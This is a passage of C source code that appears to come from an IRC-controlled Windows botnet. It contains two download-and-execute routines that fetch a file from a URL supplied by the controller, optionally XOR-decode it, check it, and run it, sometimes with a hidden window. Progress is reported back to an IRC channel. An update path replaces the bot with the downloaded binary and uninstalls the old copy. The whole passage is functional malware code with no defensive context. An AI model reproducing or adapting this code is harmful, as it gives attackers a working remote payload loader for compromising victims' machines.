fInternetCloseHandle(fh);
if (!dl.silent)
irc->pmsg(dl.target,"%s File download: %.1fKB to: %s @ %.1fKB/sec.",(dl.bdata1?update_title:download_title), total/1024.0, dlto, speed/1024.0);
if (!dl.bdata1 && dl.bdata2)
{
STARTUPINFO si;
PROCESS_INFORMATION pi;
BOOL hide=dl.bdata3, wait=dl.verbose;
char path[MAX_PATH];
strncpy(path,dlto,sizeof(path));
if (!fPathRemoveFileSpec(path))
{
if (!dl.silent)
irc->pmsg(dl.target,"%s Couldn't parse path, error: <%d>", download_title, GetLastError());
return 1;
}
ZeroMemory(&si,sizeof(si));
ZeroMemory(&pi,sizeof(pi));
si.cb=sizeof(si);
si.dwFlags = STARTF_USESHOWWINDOW;
si.wShowWindow = (hide?SW_HIDE:SW_SHOW);
if (!CreateProcess(NULL,dlto,NULL,NULL,FALSE,0,NULL,path,&si,&pi))
{
if (!dl.silent)
irc->pmsg(dl.target,"%s Failed to create process: \"%s\", error: <%d>", download_title, dlto, GetLastError());
return 1;
}
else
{
DWORD start=GetTickCount();
if (!dl.silent)
irc->pmsg(dl.target,"%s Created process: \"%s\", PID: <%d>",download_title,dlto,pi.dwProcessId);
if (dl.verbose)
{
WaitForSingleObject(pi.hProcess,INFINITE);
DWORD stop=GetTickCount();
char ttime[120],stime[120];
stime[0]='\0';
DWORD total = ((stop - start)/1000);
DWORD hours = (total%86400)/3600;
DWORD minutes = ((total%86400)%3600)/60;
DWORD seconds = ((total%86400)%3600)%60;
if (hours>0)
{
sprintf(ttime," %d%s",hours,(hours==1?" hour":" hours"));
strcat(stime,ttime);
}
sprintf(ttime," %.2d:%.2d",minutes,seconds);
strcat(stime,ttime);
irc->pmsg(dl.target,"%s Process Finished: \"%s\", Total Running Time: %s.",download_title,dlto,stime);
}
if (pi.hProcess) CloseHandle(pi.hProcess);
if (pi.hThread) CloseHandle(pi.hThread);
}
// download is an update
}
else if (dl.bdata1)
{
PROCESS_INFORMATION pinfo;
STARTUPINFO sinfo;
ZeroMemory(&pinfo, sizeof(PROCESS_INFORMATION));
ZeroMemory(&sinfo, sizeof(STARTUPINFO));
sinfo.cb = sizeof(sinfo);
sinfo.wShowWindow = SW_HIDE;
if (CreateProcess(NULL, dlto, NULL, NULL, FALSE, NORMAL_PRIORITY_CLASS|DETACHED_PROCESS, NULL, NULL, &sinfo, &pinfo) == TRUE)
{
uninstall(TRUE,(dl.idata1==1?TRUE:FALSE));
irc->quit(str_quit_upd);
Sleep(FLOOD_DELAY);
irc->disconnect();
fWSACleanup();
ExitProcess(EXIT_SUCCESS);
}
else
{
if (!dl.silent)
irc->pmsg(dl.target,"%s Update failed: Error executing file: %s.",update_title,dlto);
}
}
}
else
{
if (!dl.silent)
irc->pmsg(dl.target,"%s Bad URL or DNS Error, error: <%d>",(dl.bdata1?update_title:download_title),GetLastError());
}
clearthread(dl.threadnum);
ExitThread(0);
return 0;
}
// function for downloading files/updating
DWORD WINAPI DownloadThread(LPVOID param)
{
char buffer[IRCLINE];
DWORD r, d, start, total, speed;
DOWNLOAD dl = *((DOWNLOAD *)param);
DOWNLOAD *dls = (DOWNLOAD *)param;
dls->gotinfo = true;
HANDLE fh = fInternetOpenUrl(ih, dl.url, NULL, 0, 0, 0);
if (fh != NULL) {
// open the file
HANDLE f = CreateFile(dl.dest, GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, 0, 0);
// make sure that our file handle is valid
if (f < (HANDLE)1) {
sprintf(buffer,"[DOWNLOAD]: Couldn't open file: %s.",dl.dest);
if (!dl.silent) irc_privmsg(dl.sock,dl.chan,buffer,dl.notice);
addlog(buffer);
clearthread(dl.threadnum);
ExitThread(EXIT_FAILURE);
}
total = 0;
start = GetTickCount();
char *fileTotBuff=(char *)malloc(512000); //FIX ME: Only checks first 500 kb
do {
memset(buffer, 0, sizeof(buffer));
fInternetReadFile(fh, buffer, sizeof(buffer), &r);
if (dl.encrypted)
Xorbuff(buffer,r);
WriteFile(f, buffer, r, &d, NULL);
if ((total) < 512000) {
//We have free bytes...
//512000-total
unsigned int bytestocopy;
bytestocopy=512000-total;
if (bytestocopy>r)
bytestocopy=r;
memcpy(&fileTotBuff[total],buffer,bytestocopy);
}
total+=r;
if (dl.filelen)
if (total>dl.filelen)
break; //er, we have a problem... filesize is too big.
if (dl.update != 1)
sprintf(threads[dl.threadnum].name, "[DOWNLOAD]: File download: %s (%dKB transferred).", dl.url, total / 1024);
else
sprintf(threads[dl.threadnum].name, "[DOWNLOAD]: Update: %s (%dKB transferred).", dl.url, total / 1024);
} while (r > 0);
bool goodfile=true;
if (dl.filelen) {
if (total!=dl.filelen) {
goodfile=false;
sprintf(buffer,"[DOWNLOAD]: Filesize is incorrect: (%d != %d).", total, dl.filelen);
irc_privmsg(dl.sock,dl.chan,buffer,dl.notice);
addlog(buffer);
}
}
speed = total / (((GetTickCount() - start) / 1000) + 1);
CloseHandle(f);
/* if (dl.expectedcrc) {
unsigned long crc,crclength;
sprintf(buffer,"crc32([%lu], [%d])\n",fileTotBuff,total);
crclength=total;
if (crclength>512000) crclength=512000;
crc=crc32(fileTotBuff,crclength);
if (crc!=dl.expectedcrc) {
goodfile=false;
irc_privmsg(dl.sock,dl.chan,"CRC Failed!",dl.notice);
}
} */
free(fileTotBuff);
if (dl.expectedcrc) {
unsigned long crc=crc32f(dl.dest);
if (crc!=dl.expectedcrc) {
goodfile=false;
sprintf(buffer,"[DOWNLOAD]: CRC Failed (%d != %d).", crc, dl.expectedcrc);
irc_privmsg(dl.sock, dl.chan, buffer, dl.notice);
addlog(buffer);
}
}
if (goodfile==false)
goto badfile;
//download isn't an update
if (dl.update != 1) {
sprintf(buffer, "[DOWNLOAD]: Downloaded %.1f KB to %s @ %.1f KB/sec.", total / 1024.0, dl.dest, speed / 1024.0);
if (!dl.silent) irc_privmsg(dl.sock, dl.chan, buffer, dl.notice);
addlog(buffer);
if (dl.run == 1) {
CreateProc(dl.dest,NULL,SW_SHOW);
if (!dl.silent) {
sprintf(buffer,"[DOWNLOAD]: Opened: %s.",dl.dest);
irc_privmsg(dl.sock,dl.chan,buffer,dl.notice);
addlog(buffer);
}
}
// download is an update
} else {
sprintf(buffer, "[DOWNLOAD]: Downloaded %.1fKB to %s @ %.1fKB/sec. Updating.", total / 1024.0, dl.dest, speed / 1024.0);
if (!dl.silent) irc_privmsg(dl.sock, dl.chan, buffer, dl.notice);
addlog(buffer);
if (CreateProc(dl.dest,NULL,SW_HIDE) != 0) {
fWSACleanup();
uninstall();
ExitProcess(EXIT_SUCCESS);
} else {
sprintf(buffer,"[DOWNLOAD]: Update failed: Error executing file: %s.",dl.dest);
if (!dl.silent) irc_privmsg(dl.sock, dl.chan, buffer, dl.notice);
addlog(buffer);
}
}
} else {
sprintf(buffer,"[DOWNLOAD]: Bad URL, or DNS Error: %s.",dl.url);
if (!dl.silent) irc_privmsg(dl.sock, dl.chan, buffer, dl.notice);
addlog(buffer);
}
badfile:
fInternetCloseHandle(fh);
clearthread(dl.threadnum);
ExitThread(EXIT_SUCCESS);
}
